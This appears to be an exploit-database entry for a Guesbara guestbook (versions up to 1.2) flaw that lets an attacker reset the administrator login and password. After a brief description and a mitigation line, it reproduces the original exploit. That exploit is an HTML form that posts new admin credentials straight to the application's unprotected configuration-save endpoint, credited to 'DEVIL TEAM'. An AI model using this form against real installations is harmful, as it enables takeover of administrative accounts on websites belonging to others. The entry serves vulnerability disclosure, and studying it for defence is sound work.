header-logo
Suggest Exploit
vendor:
Guesbara
by:
Kacper
7.5
CVSS
HIGH
Change administrative password
CWE
Product Name: Guesbara
Affected Version From: 1
Affected Version To: 1.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Guesbara <= 1.2 Change admin login & password exploit by Kacper

The Guesbara application is vulnerable to a flaw that allows attackers to change the administrative password. By exploiting this vulnerability, an attacker can gain administrative access to the affected application, leading to a complete compromise of the application.

Mitigation:

It is recommended to update to a patched version of the Guesbara application or apply any available security fixes provided by the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23029/info

Guesbara is prone to a vulnerability that may permit attackers to change the administrative
password.

Exploiting this issue may allow an attacker to gain administrative access to the affected application. Successful exploits will result in a complete compromise of the application. 

<html> <title>Guestbara <= 1.2 Change admin login & password exploit by Kacper</title> <table border=0 cellspacing=0 cellpadding=0 align='center'> <form method='post' action='http://127.0.0.1/guestbook_path/admin/configuration.php?action=saveconfig&zapis=ok'><tr> <tr><td width=200>Admin Email</td><td><input type='text' name='admin_mail' class='textfield' value=''></td></tr> <tr><td width=200>Admin Name</td><td><input type='text' name='login' class='textfield' value=''></td></tr> <tr><td width=200>Admin Pass</td><td><input type='password' name='pass' class='textfield' value=''></td></tr> <tr><td colspan=2 align=center> <p> <input type='submit' name='submit' value='Zachowaj'> </p> <p>by Kacper </p> <p>for</p> <p><a href="http://www.rahim.webd.pl/" target="_blank">DEVIL TEAM </a></p></td></tr> </form></table> <p>&nbsp;</p> <p align="center">script download: http://www.hotscripts.pl/produkt-3051.html</p> <p align="center">Greetz @ll DEVIL TEAM </p> </html>